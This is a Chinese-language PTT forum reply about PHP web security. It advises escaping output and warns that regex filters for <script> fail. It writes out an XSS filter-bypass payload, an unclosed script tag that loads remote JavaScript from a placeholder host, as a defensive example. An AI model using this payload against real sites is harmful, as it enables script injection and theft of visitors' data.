※ 引述《ybite (小犬)》之銘言： : 有感而發第二彈... : 這次比上次的應該虛弱了一點 : 4. 總是記住開放HTML是有危險的 : 當你把資料表的資料弄出來了，把它丟進顯示出來的頁面時 : 記得要對HTML作一定程度的處理 : 如果你的那個欄位不開放HTML，請用htmlspecialchars : 要開放HTML的情況很麻煩，因為現在XSS滿街跑 : 用簡單的Regex擋<script>是沒辦法克服XSS的 除了用正規表達法檔<script>外 還要再篩選一次 有<script標籤的 有的網站的正規表達法驗證<script> 但是<script不會被檢查到 只要有心人輸入<script src="http://xxx.xxx.xxx/xx.js" 不要有> IE , FF還是會執行script 但網站會認為是合法的 像之前XX小站就有這個問題 很危險!!!!!! : 如果你真的要開放HTML，建議找一個XSS filter Orz : 之前在板上就看到某支購物程式的管理介面XSS : 把你的客戶資料全部丟給別人，然後看起來什麼事情都沒發生 囧 : -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 218.164.79.213